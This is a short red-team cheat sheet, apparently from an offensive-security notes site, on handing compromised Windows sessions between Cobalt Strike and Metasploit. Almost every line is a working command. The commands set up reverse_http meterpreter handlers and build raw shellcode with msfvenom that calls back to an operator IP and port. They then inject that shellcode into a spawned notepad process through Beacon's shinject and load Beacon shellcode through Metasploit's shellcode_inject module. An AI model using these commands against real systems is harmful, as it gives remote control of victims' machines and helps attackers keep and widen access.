Session Passing

Cobalt -> Metasploit

32bit payloads

root@kali:~# msfconsole

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
msf6 exploit(multi/handler) > set LHOST eth0
msf6 exploit(multi/handler) > set LPORT 8080
msf6 exploit(multi/handler) > exploit -j

# Create Foreign HTTP Listener (10.10.5.120:8080)
# Only x86 shells
beacon> spawn foreign_listener

64bit payloads

root@kali:~# msfconsole

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_http
msf6 exploit(multi/handler) > set LHOST eth0
msf6 exploit(multi/handler) > set LPORT 8080
msf6 exploit(multi/handler) > exploit -j

root@kali:~# msfvenom -p windows/x64/meterpreter_reverse_http LHOST=10.10.5.120 LPORT=8080 -f raw -o /tmp/msf.bin

beacon> execute C:\Windows\System32\notepad.exe

beacon> shinject 1492 x64 C:\Payloads\msf.bin

Metasploit -> Cobalt

# Generate x64 Raw Payload From Cobalt

msf6 > use post/windows/manage/shellcode_inject
msf6 post(windows/manage/shellcode_inject) > set SESSION 1
msf6 post(windows/manage/shellcode_inject) > set SHELLCODE /tmp/beacon.bin
msf6 post(windows/manage/shellcode_inject) > run

PreviousLocal Port Forwards NextP2P Listeners

Last updated 3 years ago